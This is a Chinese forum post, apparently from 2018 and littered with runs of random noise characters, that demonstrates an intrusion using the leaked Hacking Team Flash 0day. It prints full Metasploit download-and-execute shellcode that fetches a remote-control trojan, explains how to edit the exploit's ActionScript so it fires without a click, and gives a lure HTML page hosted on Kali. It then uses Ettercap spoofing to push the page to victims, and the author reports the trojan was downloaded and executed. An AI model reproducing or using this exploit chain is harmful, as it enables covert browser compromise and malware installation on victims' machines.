|
( H) K! O+ R! F8 P7 S' O, V
三、flash 0day之手工代码修改制作下载者实例入侵演示
, e0 |0 {% o$ B, S& A+ X0 ]. ` ( x; K) h- ~1 v* C: A
/ h5 W8 U M+ P A0 y 利用到的工具: * p$ F k% J) S9 Z6 c
5 v- U6 s4 D k% b+ ?9 V y2 U; b
1 @8 S% m* |- I! e6 O Msf
! V' z/ g$ c2 t& t$ ^ * V' z3 u" `8 ?9 C8 y
5 R8 F8 @1 Z4 x1 H Ettercap 2 S& c* }+ F7 g; O! |& k
. o* `) `# r4 Y# R+ l
) o/ Q7 m/ g3 l: u Adobe Flash CS6 9 H0 J; j8 l1 J, v& a E. K
6 V& g# X; o/ n# {
7 V2 `/ R3 E5 I2 d; ]# ?' | Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份
' `2 O) u1 B4 q + {0 W% K3 [2 i) m0 Z# u
0 Q6 Z0 \- F6 u2 a
下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_exec,show options - k3 m8 y2 f3 N; d5 Z# n C2 R2 z
/ E5 B3 g1 X3 Q; c
8 J/ F9 N8 n U0 I, A2 I" M- s 如图: - E/ O7 z) m/ w2 n, m
% z: Y, o: ^" a0 }6 Q# b; j) g) D
& T4 W$ d/ e4 a) ?* K
: f+ z4 a2 @- _+ E$ r1 Q& \
, w7 y. V7 V5 D: i0 z
* J) m4 \1 S" Q! X0 T  3 [8 C5 J9 I/ e4 \* S
, x @# l' i' y( c" w7 }6 `
( N4 |0 n8 W8 R2 r4 f 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图: 1 l V w* Y" D9 r. v5 a0 @0 V% A
( b6 c. X/ ?, T1 l
1 C2 b4 C0 @* {3 p! G* p$ Z! p ! [/ A9 C6 p7 ^7 G; O
5 x+ Y* N( ~ X; q- }" l
- w; k) k* [6 f9 M
/ O. @; J6 o9 a & @3 \* @& f% g! }
9 y$ [. r- W; E( G- | 然后执行generate -t dword生成shellcode,如下:
# j2 v" i6 O! @8 Q6 C ! u5 v. b1 i; d- H/ R) b; v, |
+ k0 J$ O8 T5 U' d, c: ^
& p, _3 }' u- g3 V0 c1 |6 T
# |: A, {; y5 `( Y1 t
3 i( |) ~: F0 ` 复制代码到文本下便于我们一会编辑flash exp,如下: ! v/ ~4 w2 g V$ X" j a
* G5 V4 a8 J- q4 i. ^7 P7 k
1 x( W2 s) X8 O/ ^
0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, 3 S9 U$ Q9 }3 |; X# t. F
# r8 B' B3 X( b0 g* h& C" \9 L1 p' K" `8 ]! Y( u* I- V7 u
0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0,
: S+ y$ U* p2 N4 q' }% l- y
# P8 o( K0 @# S V* ~; `
9 C- Y: x, H- Q. G; U7 ^+ K& t3 r 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, 2 N0 {5 D& o5 P1 P2 B9 v% f, C \
7 E# L3 h7 j. I$ u( w: u
6 Z, D; }: e! r 0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489,
; f# A$ M: W8 U, a6 L6 f. [1 u/ i
4 j9 L# j8 q0 v
i/ K& A6 _2 ^" q; u1 c% k0 l 0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854,
4 B, `# E7 U" P. J, Q+ N0 q8 A
3 K1 t& d. q3 A, B2 F, A/ t7 U L4 q- Q- E4 q% n
0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51, . z" A) u2 H" Q! H3 N# H' F, ]# a
- ], B, W. ^- a
% K Y, ~# o8 Z1 N 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, 7 A8 p# l4 Z* H7 Z; V
5 N5 l) R2 D1 G' ]
3 g/ \6 e, g5 [/ O) o8 c 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757,
3 t* J% _( T7 B6 V5 W
2 }+ q: D% T' e( \
- M, i [1 ^4 R$ a$ w 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff,
- X5 W5 D; |& d% |) V X
. x9 o0 L) R1 z3 M& h" i; K3 r) P6 {
; T) b1 I' m% r. y i" F5 m; z 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6,
7 |) g1 }) E& U- Q+ O) y+ \ ) Q* R# W+ P! a0 Q/ Q+ K
4 j5 @8 b- m+ v$ s/ b6 o4 R 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, - |/ @$ o( E* r1 `1 i
* ~' O; y/ e9 i2 N& Y) e
! M) K1 T. V# R 0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853,
2 v$ j7 U: S! E$ e& r7 o+ `
! A' T- I6 C1 X" \( U ]
+ |6 T- z: u0 ]$ i! ^: b% M 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973,
; ?9 F0 M8 [. ~ ~) V, V4 t% T
5 j9 o" C' s9 X% E2 |- T, q4 \4 ^# M% V! ]' L! G# e8 M
0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 0 {2 H0 q1 i; X0 t$ ?" Q
* k8 S/ T, N( B) ~
/ ~# {) N5 x" z: h3 T' X2 c a/ L
4 k0 R% ^- U6 s! X/ P5 f4 ` 2 B8 ^9 e/ d& U N ]
. ~. l; Y' P" q K$ @1 N
/ e" T: @% `% J1 r6 n# I- @% ] 8 k0 l; I! c4 k0 t: }) ^
+ p; ~& h0 x- Z8 ?. [8 w( q, R: o 下面我们来修改flash 0day exp,需要修改三个文件,分别为: . O: Z+ v; x% k4 b
3 ~* y) `( ]/ k" ?0 P" E8 U Y7 G9 w- `; l4 Z( [: A9 d
& _: A2 C, p: d! v
$ y1 O1 X! L" E6 G3 Q+ _6 l$ ^4 N/ U: }* U
先修改ShellWin32.as,部分源代码如图:
$ k) O) I' \; L) r) n0 e. w
4 O8 i. c4 N* p$ x
3 o: d2 b. c5 ~) B0 Y8 w- Z  * R0 f3 b& \9 H( {
# v+ H/ v2 k+ f7 w1 n
" j% l& G2 M0 V, _$ s 我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下: ! ~( ]& G9 O+ ^" d% @' T! X. o: @8 W
' b( w9 E" q+ t+ z7 U! J! U1 t6 B# _ [$ Z4 F
 ; X% ^8 d& @7 j/ y( ^
0 v+ o8 R3 y) z( T1 M2 X
- L9 s; l. d6 {. l 然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图: . g- I d) Q$ U6 o# a
' B3 g. q5 f1 C
1 m: z. E. G" Y% C( C) G: l- U
 " r+ b# l U6 p: l
, \9 w/ O% ]3 p4 f Q/ v1 n3 l! R$ p
换行在后面加一句TryExpl();注意是l不是数字1,然后如图: & O9 |" n! J1 }& L. s. L! G
$ L- O7 K: [5 X4 }/ q) g3 N& E4 ^3 a9 [" M. \ b
$ }8 @$ f. b: K `# v+ d 0 {6 s* [0 b3 F4 c7 o' b6 v! D
6 W6 g6 F) m5 m: M0 ~* ` + {) q1 s5 s9 G# G% n
: M" v* N; B& d G. |& W9 L' c% H
% o" e7 G4 ?3 z' F8 e
 0 F1 g; d/ e8 S; R5 e6 Y; Q; V1 I5 O) c
4 y; ?4 N, G) B0 w4 f# Y) g, r
+ m! [3 [% L7 Z 然后点保存,下面我们来编译一下,打开 + s& \6 L: ?+ D+ ~. ~7 Q" Q6 M
+ ]" m; D) R0 B$ a7 S
! x+ ~& V( [3 z+ m3 }8 W exp1.fla然后点文件-发布,看看编译没错误 4 r4 r- A: m" i, z1 Y
/ I9 d; o7 H9 m! _& h9 [4 n; `
, c* t! h; `. ^' V3 ?; ?3 n2 H - r8 B B: a, B; V" u: @, L
; D, J, B! X* p/ w3 D
- n5 y* h5 e- I$ t1 l % s0 g M! h' p4 J
4 C' w& q% Y; i; u. f3 G" {% j
# w, J, l% a; b ' O$ s5 o" C$ o/ x8 G
" o$ N; O) E" E* w' h4 O; S+ w6 z* x' h/ i) c5 L! I# |
7 M5 `1 F0 }, N , Y4 e5 A. Y( }) L% m' ~5 T
9 t1 J( p' x( _ T4 T 然后我们把生成的
7 Y5 o1 i3 o2 G: K+ t/ f+ w 9 k4 Z1 M- F2 [* G/ R4 t
; n6 p/ |3 @, r2 W9 I8 Z) W$ r
exp1.swf丢到kailinux 的/var/www/html下:
. d2 s9 c( g) G$ g+ T2 N/ u
3 n3 x7 {- I6 X2 Z2 N& Q9 ? Y
* F/ W% V w; ?- D9 ^- q9 N 然后把这段代码好好编辑一下 5 ^, Y: b/ N% e# t+ c9 o
& a: a: B4 O1 }1 [! ~+ A. Q
8 h5 `0 o# U/ F# c+ m
' g0 U8 h" ?( T: b. W& C& a
& R1 u) T$ b. }1 a. Q
) N: r4 Q0 n% j1 f
& ]8 t& j% U: U - f. `) G* W0 `# M% Q3 |- A, d
l0 K3 {& t$ S. U 8 c/ i: Z* s! E8 w
# P; |4 k# S% p
& s9 `, H# ^3 q: q4 P) L. |; |: C
6 R" w7 s6 x% X0 E7 Z6 k
& k) c( ~% j; s5 A, [- u/ }4 r% w. `$ l& _2 y5 p% ]; E
' i) z8 o. l/ m. `' T! M+ W5 ?( y
- g/ f% b2 n2 L. r0 O, S$ t: L4 n3 Y- a( X
9 R* H* G1 v/ p+ D) d & I6 P3 T% n! f& Y. k
" i/ M7 Q- e1 k/ k/ w <!DOCTYPE html> 5 a& g8 E* |: }/ d
/ J5 g6 a I2 P+ n- P: K9 _
( }4 M! u* T% n, Y- b" R5 ]
<html> 5 Z$ F& n4 L5 W# i2 l0 u1 y3 p* W
7 K# Q: A! X; @+ t& V& q2 w2 K% s* K0 n& F1 H/ [
<head> $ V9 H5 C8 b F5 ]; W
5 X( k" W' G. {8 G* {& q+ e
6 k$ Q( A, X' ~ P F9 R- ]$ K. u <meta http-equiv="Content-Type" content="text/html;
) X/ V$ n! L3 k* s2 D ) D" B8 r& B! P8 ~) e! u
$ Y2 x) U1 F( e2 {" p! Q( ~- ^
charset=utf-8"/>
8 I# [ a) n3 B! i - z& I# e R- @( U
, u, A9 K: v/ o, H( f6 [( g
</head>
6 C |% ]# g$ P, {( p0 z! k " ~) l2 Y- t3 _: M; v
, G+ {. B8 F" |! i( p! V
<body> @6 U w8 H% q$ j6 C
* Q& Z/ }6 J% i( g
; v. p. B, p* p4 V; _* M6 ^+ i
<h2> Please wait, the requested page is loading...</h2>
( C3 R( c' f9 |! ^8 l0 R! Q5 y+ x! N 3 e5 j3 M+ M- ?: h. ^
; i3 v |5 g' \- X <br>
8 O- l) m9 H4 L# [
& }5 ?2 H4 x& w9 i. P. @
6 c* q" o. P( H) o$ G <OBJECT ! g- z3 r7 m/ @1 y$ P( e: ^, c
# R+ W! |( s6 N. e" p0 i$ n- P
0 @$ o. W, P& w classid="clsid 27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="50" HEIGHT="50" id="4">< ARAM NAME=movie
. b: W* \( Z: x+ M
9 S+ b9 C7 \( }
6 m6 T% U5 C$ S- d* D/ l VALUE="http://192.168.0.109/exp1.swf"></OBJECT>
9 C2 N1 p6 f* h! B. y1 v6 q" r, g & _1 J6 ?* ~% p7 _. a
+ L. s! A6 F/ A; s: l7 `1 U </body> 8 {) n% e. Z2 | Y1 s. S" A
8 m( m: ~% D6 H& i5 U0 o4 c M6 ?/ n4 }
<script>
0 x- W2 A' c& T9 ~ / {9 M4 [7 n( p v9 S. K" P% b
+ H8 d; G( @ L' }- V
setTimeout(function () {
- p; t7 O: S2 L4 a' e: m" g4 ^ 5 X' v6 b9 I0 T% G
5 F1 @0 q( ~9 |) z9 A
! u6 _: P. y. q7 A G ?; r$ c5 ]4 J1 e( r$ }' f5 O1 h; u
4 `) A% Q* |: s8 E( v$ Y
window.location.reload();
/ e p1 g# d4 B& d$ s( j ( s8 }( S8 i! p( {& i
8 o2 L i! m9 p9 t: c7 F, {1 t }, 10000);
. d" j t7 Y! V' }3 R& K- D 8 i: f( O# m+ M. B. R6 L* A8 N8 W
8 |' F" q0 D4 r ^; {/ i# U
% l7 ~7 G$ L% y" P7 v1 f
/ a4 J9 b1 x, o. [1 D3 u- f9 o9 h$ T3 g
( n+ Y3 g& g; ^% Y </script> ) t& b' w' j3 a0 r4 t
, P& t8 x- {) c1 U$ ]+ t1 H7 r" W3 w6 s4 l. b. q& x# L
</html> " n8 {% S. c9 i& S" s: E- T
1 A. M" y& |/ ~# b2 }. C$ V, M! N1 b: T( @5 E
) P9 J* P! L. @" U0 Z
7 K2 @8 S$ [& A$ B% [+ H4 i3 N' v0 Z& N. D5 ?+ `$ a
注意:192.168.0.109是kali的ip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图: 8 ^9 U6 \4 |) x/ {% z# @
2 }! Q; J; ?5 f: v& i
$ {6 N" f4 i8 B' R7 d+ w8 M- F3 n  & s8 o; J0 |# s( P6 R/ z
# c4 g2 n( q( V l4 C% X
- B) j6 J0 ~9 s* _4 p' x
, v. m+ \* o( I
7 m* @! q/ v3 @1 c+ K, Z0 ~. q6 }4 n6 D$ g/ W
# J @4 a1 u; s$ V) U
8 i9 C9 Y, U) g& c0 \& i8 Y$ q$ h3 |# O) q9 G' Z
Z6 o" c) `% l9 U% T3 [ ; Y! R. V. _& G" l2 q
) u* g; c3 h% ~
. W" {# V3 S" W y
' S& l: x2 P: h% o A* ]* s9 K3 d. r2 ?0 ^5 a) w
下面我们用ettercap欺骗如图:
5 a2 ^" t. v9 v; T ' I# H8 M4 y' t2 c. e. Z
8 G/ k% k& s: Y9 p) |  4 g7 p5 k% C$ n- }# b
# D5 i2 z2 \# C# R8 M- d/ w5 g5 X" A
" O3 F1 [6 o1 e' z 0 U, V/ p0 L" i: E5 P/ o- c
& P" T9 L% {* |6 O
! Q& H: n' n X$ i4 ?# v 下面我们随便访问个网站看看: $ ?) _( r% p# s' }/ y7 C) d
( L1 G) R6 r" [
1 S( `" o% X: T% a% E
我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图: 6 a% O( o' h Y5 {
3 g% A! b. d: D8 [1 z9 B( m) G7 q9 |
 6 R( @0 p4 h$ w
5 m- s+ B; k$ J' b( `, Y
5 o+ U; B3 s( S9 k% n }% L
我们看另一台,
4 Z1 O( N; z1 _+ q
% p/ h2 e* P3 w* W* T) I& P* O6 `7 q) w& t
提示这个错误,说明木马是成功被下载执行了, 只是由于某些原因没上线而已。。。
2 M- K: T5 t4 [: k1 x | 
发表于 2018-10-20 20:28:55
收藏
支持
反对